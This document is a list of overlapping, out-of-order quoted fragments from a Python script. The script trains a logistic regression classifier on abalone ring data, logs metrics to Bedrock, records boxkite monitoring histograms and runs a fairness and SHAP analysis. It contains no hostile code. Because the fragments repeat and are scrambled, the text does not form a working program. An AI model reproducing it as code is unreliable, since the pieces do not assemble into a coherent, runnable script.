".fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.') if __name__",
"int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def main(): x_train,",
"group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name",
"= pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column",
"(train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators with",
"str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the features as",
"\"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing",
"scaling), ('model', model)]) verbose and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test:",
"df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float",
"metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) )",
"Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline",
"variable :type y: numpy.ndarray :param seed: `random_state` for logistic regression model :type seed:",
":param filepath: Path to load the data :type filepath: str :param target: Target",
"assumes binary classification # For multiclass labels, we can use a \"micro-average\" by",
"by # quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa:",
"pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector",
"Pipeline of transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test:",
"= pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len =",
"pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float = 1, verbose: bool",
":type C: float :param verbose: Whether to print additional info :type verbose: bool",
"and print('Done training.') return pipe def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot:",
"bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\":",
"Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns the features as a pandas",
"f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc =",
"print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose",
"precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\":",
"BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder from environs import Env from",
"(macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model",
"as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model and",
"np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import",
"[0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def",
"import joblib from typing import Tuple import bdrk import numpy as np import",
"of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...')",
"are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder =",
"Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train)",
"} ) # `log_chart_data` assumes binary classification # For multiclass labels, we can",
"= metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall",
":return: The features pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray]",
"def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and",
"target variable to numeric values # ModelMonitoringService.export_text expect both features # and inference",
"# `log_chart_data` assumes binary classification # For multiclass labels, we can use a",
"Target variable :type y: numpy.ndarray :param seed: `random_state` for logistic regression model :type",
"= [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete",
"encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability and predictions",
"= load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score`",
"NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def train_log_reg_model(X:",
"verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0])",
"C: float :param verbose: Whether to print additional info :type verbose: bool :return:",
":param verbose: Whether to print additional info :type verbose: bool :return: Pipeline of",
"MetricEncoder from environs import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression",
":type target: str :return: The features pandas dataframe and the target numpy array",
"load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)')",
"discrete={7, 8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) #",
"acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC",
"f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( {",
"test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and inferance distribution",
"numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] >",
"predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred =",
"list of int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob, test_pred def",
"\"Small\", } } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads",
"\"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes",
"= original_len - len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows",
"logistic regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param y:",
"as a numpy array. :param filepath: Path to load the data :type filepath:",
"max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)])",
"feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained",
"the dataset and returns the features as a pandas dataframe and the target",
"X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed,",
"= {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") #",
"on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will",
":type verbose: bool :return: Pipeline of transforms with a trained final estimator :rtype:",
"Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f:",
"env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\":",
"precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification # For multiclass",
"numpy.ndarray :param seed: `random_state` for logistic regression model :type seed: float :param C:",
"# Convert target variable to numeric values # ModelMonitoringService.export_text expect both features #",
":param C: Inverse of regularization strength :type C: float :param verbose: Whether to",
"Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and",
"jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to",
"{acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) =",
"def compute_log_metrics(pipe: Pipeline, x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and",
"C: Inverse of regularization strength :type C: float :param verbose: Whether to print",
"verbose: Whether to print additional info :type verbose: bool :return: Pipeline of transforms",
"captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall (macro)\": recall,",
"a pandas dataframe and the target variable as a numpy array. :param filepath:",
"# noqa: E501 # This will allow us to use the same `log_chart_data`",
"sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category",
") return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' )",
"and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc",
"x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score`",
"filepath: str :param target: Target variable :type target: str :return: The features pandas",
"analyzer.analyze() print('Saved Shap model and fairness results.') if __name__ == '__main__': bdrk.init() with",
"the data :type filepath: str :param target: Target variable :type target: str :return:",
"x_test: pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param",
"train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which",
"= len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped >",
"average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\"",
"pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector,",
"target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) #",
"\"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification # For",
"model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test)",
"Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\")",
"y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0,",
"trains a logistic regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame",
"we can use a \"micro-average\" by # quantifying score on all classes jointly",
"import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env =",
"model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness",
"axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names",
"0, C: float = 1, verbose: bool = False) -> Pipeline: \"\"\" Scales",
"print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved",
"y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted",
":type y: numpy.ndarray :param seed: `random_state` for logistic regression model :type seed: float",
"For multiclass labels, we can use a \"micro-average\" by # quantifying score on",
"See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html # noqa: E501 # This will allow us to use the",
"df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len",
"= metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob,",
"(macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\"",
"float :param verbose: Whether to print additional info :type verbose: bool :return: Pipeline",
"with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling =",
"testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type",
"hot encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot)",
"average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\"",
"inplace=True) return df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0,",
"numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return:",
"allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of",
"and inference distribution.') # Train Shap model and calculate xafai metrics analyzer =",
"y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline of transforms",
"numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train,",
"of transforms with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features",
"= pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred,",
"column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ]",
"with a trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing",
"info :type verbose: bool :return: Pipeline of transforms with a trained final estimator",
"Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name",
"import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder",
"with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot",
"for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data",
"is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\")",
":return: Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline \"\"\" verbose",
"= enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') #",
"verbose: bool :return: Pipeline of transforms with a trained final estimator :rtype: sklearn.pipeline.Pipeline",
"roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data` assumes binary classification #",
"pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return pipe def",
"and print('C:', C) model = LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining",
"\"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0],",
"[ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete ),",
"= load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X",
"env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding",
"ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import MetricEncoder",
"from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH =",
"the target variable as a numpy array. :param filepath: Path to load the",
"Scales the features and trains a logistic regression model. :param X: Features for",
":type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test:",
"{avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\":",
"binary label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot =",
"avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\"",
"[1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], #",
"model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names",
"import Tuple import bdrk import numpy as np import pandas as pd from",
"labels, we can use a \"micro-average\" by # quantifying score on all classes",
"seed: `random_state` for logistic regression model :type seed: float :param C: Inverse of",
"y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline",
"= {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro)",
"Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision (macro)\": precision, \"Recall",
"# Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference",
"pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test,",
"\"\"\" Loads the dataset and returns the features as a pandas dataframe and",
"metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro',",
"StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model =",
") # `log_chart_data` assumes binary classification # For multiclass labels, we can use",
"filepath=TRAIN_DATA_PATH, target='Type' ) x_test, y_test = load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train)",
"str :return: The features pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame,",
"`random_state` for logistic regression model :type seed: float :param C: Inverse of regularization",
"C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name:",
"# Train Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic',",
"trained final estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test:",
"in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and",
"precision, \"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg",
"float = 1, verbose: bool = False) -> Pipeline: \"\"\" Scales the features",
"logistic regression model :type seed: float :param C: Inverse of regularization strength :type",
"def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float = 1,",
"print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}') # Convert target variable",
"(macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC",
": {value}') # Convert target variable to numeric values # ModelMonitoringService.export_text expect both",
"\"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision",
"f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger:",
"as np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector",
"of float ) return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH,",
"test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro')",
"OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI",
"Target variable :type target: str :return: The features pandas dataframe and the target",
"and `average_precision_score` expects # binary label indicators with shape (n_samples, n_classes) enc =",
"= x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names,",
"model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable",
"Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH",
"AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures",
"variable :type target: str :return: The features pandas dataframe and the target numpy",
"sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and",
"= enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]):",
"Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(),",
"(df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True)",
"encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference",
"analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze()",
"and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.')",
"joblib from typing import Tuple import bdrk import numpy as np import pandas",
") print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label",
"filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects #",
"and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and",
"load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns",
"(macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) #",
"the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list",
"pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df =",
"Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as",
"multiclass labels, we can use a \"micro-average\" by # quantifying score on all",
"be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe =",
"num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y =",
"distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify",
"x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc,",
"the features and trains a logistic regression model. :param X: Features for training",
"metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro')",
"average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro)",
":type seed: float :param C: Inverse of regularization strength :type C: float :param",
"test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) =",
"calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test)",
"print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return",
"import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import",
"\"\"\" Scales the features and trains a logistic regression model. :param X: Features",
":type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type y_test_onehot:",
"TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1],",
"and the target variable as a numpy array. :param filepath: Path to load",
"test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall",
"FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted,",
"float = 0, C: float = 1, verbose: bool = False) -> Pipeline:",
"ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import",
"metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\"",
"train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE",
"feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic",
"# ModelMonitoringService.export_text expect both features # and inference to be numeric values y_train",
"\"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", }",
"feature and inference distribution.') # Train Shap model and calculate xafai metrics analyzer",
"= False) -> Pipeline: \"\"\" Scales the features and trains a logistic regression",
"return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test,",
"and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI)",
"\"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\",",
"\"micro-average\" by # quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html #",
"TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\":",
"pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices",
"{precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro)",
"variable as a numpy array. :param filepath: Path to load the data :type",
"feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names })",
"df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0: print(f\"Warning",
"estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param",
"env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged",
"# For multiclass labels, we can use a \"micro-average\" by # quantifying score",
"model :type seed: float :param C: Inverse of regularization strength :type C: float",
"# Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for",
